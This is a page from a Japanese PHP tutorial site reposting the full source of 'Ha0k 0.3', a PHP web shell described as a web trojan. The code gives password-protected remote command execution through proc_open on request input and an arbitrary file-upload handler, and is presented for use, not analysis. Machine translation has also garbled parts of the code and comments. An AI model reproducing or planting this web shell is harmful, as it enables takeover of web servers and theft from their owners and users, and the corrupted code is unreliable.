ホームページ >バックエンド開発 >PHPチュートリアル >Ha0k 0.3 PHP Web トロイの木馬修正版_PHP チュートリアル

Ha0k 0.3 PHP Web トロイの木馬修正版_PHP チュートリアル

WBOY
WBOYオリジナル
2016-07-21 15:44:08847ブラウズ

コードをコピーします コードは次のとおりです:

//ここに複数のユーザーを設定できます
$passwd = array('ha0k' => 'ha0k',
'hackerdsb'=>'hackerdsb');
/* ここに設定します コマンドエイリアス*/
$aliases = array('ls' => 'ipconfig',
'll' => 'ls -lvhF');
if (!isset($_SERVER['PHP_AUTH_USER'])|!isset ($_SERVER['PHP_AUTH_PW'])||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) || $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW'] ) {
header('WWW-Authenticate: Basic realm="by Ha0k"');
$authenticated = false
}
else {
$authenticated = true; /* セッションを開始します */
session_start();
/* セッションを初期化します */
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION ['cwd'] = getcwd(); // 現在のディレクトリを取得
$_SESSION['history'] = array();
$_SESSION['output'] = ''; _REQUEST['command'])) {
if (get_magic_quotes_gpc()) { //0 テーブルが閉じられ、1 つのテーブルがオン、オンの場合はフィルター
/*
の履歴にコマンドを追加したくない* エスケープ形式なのでバックスラッシュを削除します */
$_REQUEST['command'] =tripslashes($_REQUEST['command']); //addslashes() 関数で処理された文字列を元の状態に戻します
}
/* 履歴 */
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) // 保存された配列内の値を検索
unset( $_SESSION ['history'][$i]); //
array_unshift($_SESSION['history'], $_REQUEST['command']); // array_unshift() 関数は、新しい項目を配列要素。そして、この新しい配列は元の配列の先頭に追加されます。この関数が最終的に返すのは、新しい要素を挿入した後の配列です。
/* 出力Ha0k# コマンド */
$_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['コマンド'] 。 「ん」;
/* 現在の作業ディレクトリを初期化します。 */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname( __ファイル__); //获取当前所在目录
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]]+([^;]+)$', $_REQUEST['command'], $ regs)) {
/* 現在のコマンドは 'cd' コマンドであり、
* を内部シェル コマンドとして処理する必要があります。 */
if ($regs[1][0] == '/') {
/* 絶対パス。変更せずに使用します。 */
$new_dir = $regs[1];
} else {
/* 相対パス。現在の作業ディレクトリ
* に追加します。 */
$new_dir = $_SESSION['cwd'] 。 '/' 。 $regs[1];
}
/* '/./' を '/' に変換します */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/ '、$new_dir);
/* '//' を '/' に変換します */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir) ;
/* 'x/..' を '' に変換します */
while (preg_match('|/..(?!.)|', $new_dir))
$new_dir = preg_replace('|/?[^/ ]+/..(?!.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* ディレクトリを変更してみます。 */
if (@chdir($new_dir)) { //改变当前目录
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: に変更できませんでした: $new_dirn";
}
} else {
/* このコマンドは「cd」コマンドではないため、
* ディレクトリを変更した後に実行し、出力を保存します。 */
chdir($_SESSION['cwd']); //改变目录
/* 别名扩展 */
$length = strcspn($_REQUEST['command'], " t"); //查找t文字列、戻り位置
$token = substr($_REQUEST['command'], 0, $length); //取字符串0-t
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] 。 substr($_REQUEST['コマンド'], $length);
$p = proc_open($_REQUEST['command'], //スクリプトを実行
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w' ))、
$io);
/* 读出送信 */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]), //转换特殊文字はHTML字符编码
ENT_COMPAT, 'GB2312');
}
/* 读出 */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'GB2312' );
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);//关闭管道
}
}
/* 构建在JavaScript使用コマンド历史记录 */
if (empty($_SESSION['history'])) {
$js_command_hist = '""' ;
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';// 将数组搞成字串
}
}
header('Content-Type: text/html ; 文字セット=GB2312');
echo '' 。 「ん」;
?>
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
//echo "上传文件成功: " . $HTTP_POST_FILES['ユーザーファイル']['名前'];
}
?>
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


Ha0k Webシェル






HA0K


私たちは正義のために、正義のために戦います


PhpShell に対する認証に失敗しました。 href="">リロード ができます。もう一度試してください。


インストール を読んでみてください。 PhpShell のインストールで
問題が発生した場合は、このファイルを参照してください。




終了;
}
エラー報告 (E_ALL);
if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10;
?>

現在の目录は: <?php echo $_SESSION['cwd'] ?>








$ onkeyup="key(event)" size="78" tabindex="1">





行数:





本地文件名:

远程文件名:





Mcafee(麦咖啡杀毒软件) 阻止网页被挂马的設置教程(最終不要在服务器端打开) 我们强烈推荐服务器装着mcafee 8.5iのバージョン
全世界最小限のphp网页木马一枚添付PHP木马の防御方法

http://www.bkjia.com/PHPjc/320598.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/320598.html技術記事例: ?php //ここでは複数のユーザーを設定できます $passwd = array('ha0k' = 'ha0k', 'hackerdsb'='hackerdsb'); /* この設定コマンドの名前 */ $aliases = array('ls' = '...
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
前の記事:PHPオブジェクト指向ガイド(3) 特殊参照「$this」の使い方_PHPチュートリアル次の記事:PHPオブジェクト指向ガイド(3) 特殊参照「$this」の使い方_PHPチュートリアル

関連記事

続きを見る